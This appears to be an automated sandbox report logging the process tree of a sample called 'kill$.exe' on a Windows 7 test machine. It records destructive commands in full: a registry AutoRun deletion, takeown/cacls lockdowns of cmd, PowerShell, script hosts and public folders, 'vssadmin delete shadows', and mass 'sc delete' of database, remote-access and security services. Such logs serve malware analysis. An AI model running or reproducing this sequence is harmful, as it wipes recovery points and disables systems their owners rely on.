kill$.exe| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6401 | Aug. 6, 2021, 9:21 a.m. | Aug. 6, 2021, 9:50 a.m. |
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe"
2252-
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
2724 -
takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
2760 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1808 -
cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
1316 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2420 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
2892 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1296 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
2448 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1468 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
872 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2084 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
2988 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2660 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
2772 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1940 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
1572 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2680 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
1976 -
takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
2092 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2720 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
2144 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
596 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
2408 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
852 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
1108 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2212 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
1164 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2384 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
2256 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3108 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3148 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3200 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3292 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3332 -
takeown.exe takeown /f C:\Windows\system32\net.exe /a
3384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3432 -
cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
3472 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3524 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
3564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3616 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
3656 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3708 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
3748 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3800 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
3840 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3892 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
3932 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3984 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d system
4024 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4076 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3096 -
takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
3180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3260 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3312 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3376 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3448 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3516 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3596 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3672 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
2248 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2344 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3660 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3792 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3872 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3952 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
4004 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4068 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3120 -
takeown.exe takeown /f C:\Windows\system32\net1.exe /a
3232 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3256 -
cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
3460 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3580 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
3644 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2428 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3740 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3856 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
3920 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4028 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3344 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
3536 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1452 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
3712 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3924 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3972 -
takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
3320 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3512 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3488 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3884 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
2200 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3604 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3788 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3948 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3272 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3620 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
2356 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3584 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
2080 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3348 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
3944 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4108 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
4148 -
takeown.exe takeown /f C:\Windows\system32\mshta.exe /a
4200 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4252 -
cacls.exe cacls C:\Windows\system32\mshta.exe /g Administrators:f
4292 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4344 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Users:r
4384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4436 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
4476 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4528 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d SERVICE
4568 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4620 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
4660 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4712 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d "network service"
4752 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4804 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d system
4844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4896 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
4936 -
takeown.exe takeown /f C:\Windows\SysWOW64\mshta.exe /a
4988 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5036 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
5076 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4104 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
4160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2520 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
4284 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4364 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
4424 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4504 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
4560 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4636 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
4700 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4780 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d system
4832 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4912 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
4900 -
takeown.exe takeown /f C:\Windows\system32\FTP.exe /a
5088 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4136 -
cacls.exe cacls C:\Windows\system32\FTP.exe /g Administrators:f
4180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4360 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Users:r
4388 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4580 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
2340 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4692 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d SERVICE
4708 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4916 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
5004 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5116 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d "network service"
4112 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4372 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d system
4296 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4556 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
4784 -
takeown.exe takeown /f C:\Windows\SysWOW64\FTP.exe /a
4952 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4992 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
4196 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4464 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
4524 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4756 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
4848 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5016 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
4744 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5048 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
4956 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4908 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
2120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4480 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d system
4240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5156 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
5196 -
takeown.exe takeown /f C:\Windows\system32\wscript.exe /a
5248 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5296 -
cacls.exe cacls C:\Windows\system32\wscript.exe /g Administrators:f
5336 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5388 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Users:r
5428 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5480 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
5520 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5572 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d SERVICE
5612 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5664 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
5704 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5756 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d "network service"
5796 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5848 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d system
5888 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5940 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
5980 -
takeown.exe takeown /f C:\Windows\SysWOW64\wscript.exe /a
6032 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6080 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
6120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5188 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
5240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5328 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
5384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5392 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
5536 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5600 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
5616 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5776 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
5760 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5920 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d system
5972 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6048 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
6112 -
takeown.exe takeown /f C:\Windows\system32\cscript.exe /a
6124 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5288 -
cacls.exe cacls C:\Windows\system32\cscript.exe /g Administrators:f
5376 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5432 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Users:r
5588 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5720 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
5808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5936 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d SERVICE
5916 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5132 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
5236 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5324 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d "network service"
5564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5748 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d system
5900 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6060 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
5228 -
takeown.exe takeown /f C:\Windows\SysWOW64\cscript.exe /a
5456 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5524 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
5944 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5448 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
5500 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6024 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
5540 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5420 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
5708 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5340 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
6168 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6220 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
6260 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6312 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d system
6352 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6404 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
6444 -
takeown.exe takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
6496 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6544 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6584 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6636 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6676 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6728 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6768 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6820 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6884 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6936 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
6976 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7028 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
7068 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7120 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
7160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2544 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6276 -
takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
6340 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6424 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6484 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6560 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6624 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6704 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6756 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6832 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6896 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6956 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
2192 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7096 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
7132 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6236 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
6216 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6464 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6416 -
takeown.exe takeown /f C:\ProgramData /a
6664 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6748 -
cacls.exe cacls C:\ProgramData /g Administrators:f
6788 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6952 -
cacls.exe cacls C:\ProgramData /e /g Users:r
6980 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6160 -
cacls.exe cacls C:\ProgramData /e /g Administrators:r
6252 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6332 -
cacls.exe cacls C:\ProgramData /e /d SERVICE
6612 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6740 -
cacls.exe cacls C:\ProgramData /e /d mssqlserver
6824 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6968 -
cacls.exe cacls C:\ProgramData /e /d "network service"
7124 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6524 -
cacls.exe cacls C:\ProgramData /e /d system
6720 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6992 -
cacls.exe cacls C:\ProgramData /e /d mssql$sqlexpress
6188 -
takeown.exe takeown /f C:\Users\Public /a
6652 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6852 -
cacls.exe cacls C:\Users\Public /g Administrators:f
6264 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6472 -
cacls.exe cacls C:\Users\Public /e /g Users:r
6572 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6860 -
cacls.exe cacls C:\Users\Public /e /g Administrators:r
6996 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7212 -
cacls.exe cacls C:\Users\Public /e /d SERVICE
7252 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7304 -
cacls.exe cacls C:\Users\Public /e /d mssqlserver
7344 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7396 -
cacls.exe cacls C:\Users\Public /e /d "network service"
7460 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7512 -
cacls.exe cacls C:\Users\Public /e /d system
7552 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7604 -
cacls.exe cacls C:\Users\Public /e /d mssql$sqlexpress
7644 -
vssadmin.exe vssadmin delete shadows /all /quiet
7696 -
cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
7824-
sc.exe sc delete "XT800Service_Personal"
8056 -
sc.exe sc delete SQLSERVERAGENT
7388 -
sc.exe sc delete SQLWriter
8036 -
sc.exe sc delete SQLBrowser
7440 -
sc.exe sc delete MSSQLFDLauncher
8696 -
sc.exe sc delete MSSQLSERVER
9132 -
sc.exe sc delete QcSoftService
8736 -
sc.exe sc delete MSSQLServerOLAPService
8748 -
sc.exe sc delete VMTools
8428 -
sc.exe sc delete VGAuthService
9656 -
sc.exe sc delete MSDTC
9324 -
sc.exe sc delete TeamViewer
9420 -
sc.exe sc delete ReportServer
8992 -
sc.exe sc delete RabbitMQ
8752 -
sc.exe sc delete "AHS SERVICE"
8684 -
sc.exe sc delete "Sense Shield Service"
10424 -
sc.exe sc delete SSMonitorService
10764 -
sc.exe sc delete SSSyncService
11060 -
sc.exe sc delete TPlusStdAppService1300
10520 -
sc.exe sc delete MSSQL$SQL2008
10808 -
sc.exe sc delete SQLAgent$SQL2008
10572 -
sc.exe sc delete TPlusStdTaskService1300
10404 -
sc.exe sc delete TPlusStdUpgradeService1300
10976 -
sc.exe sc delete VirboxWebServer
9288 -
sc.exe sc delete jhi_service
11732 -
sc.exe sc delete LMS
11396 -
sc.exe sc delete "FontCache3.0.0.0"
12232 -
sc.exe sc delete "OSP Service"
12108
-
-
cmd.exe cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
7908-
sc.exe sc delete "DAService_TCP"
1856 -
sc.exe sc delete "eCard-TTransServer"
7716 -
sc.exe sc delete eCardMPService
7424 -
sc.exe sc delete EnergyDataService
8424 -
sc.exe sc delete UI0Detect
9016 -
sc.exe sc delete K3MobileService
8800 -
sc.exe sc delete TCPIDDAService
8196 -
sc.exe sc delete WebAttendServer
8644 -
sc.exe sc delete UIODetect
9812 -
sc.exe sc delete "wanxiao-monitor"
8792 -
sc.exe sc delete VMAuthdService
9708 -
sc.exe sc delete VMUSBArbService
10004 -
sc.exe sc delete VMwareHostd
8528 -
sc.exe sc delete "vm-agent"
9440 -
sc.exe sc delete VmAgentDaemon
10348 -
sc.exe sc delete OpenSSHd
10644 -
sc.exe sc delete eSightService
10960 -
sc.exe sc delete apachezt
10416 -
sc.exe sc delete Jenkins
10912 -
sc.exe sc delete secbizsrv
8824 -
sc.exe sc delete SQLTELEMETRY
10712 -
sc.exe sc delete MSMQ
10396 -
sc.exe sc delete smtpsvrJT
11144 -
sc.exe sc delete zyb_sync
10984 -
sc.exe sc delete 360EntHttpServer
11548 -
sc.exe sc delete 360EntSvc
12008 -
sc.exe sc delete 360EntClientSvc
11340 -
sc.exe sc delete NFWebServer
12192 -
sc.exe sc delete wampapache
11516 -
sc.exe sc delete MSSEARCH
11572 -
sc.exe sc delete msftesql
11784 -
sc.exe sc delete "SyncBASE Service"
12152 -
sc.exe sc delete OracleDBConcoleorcl
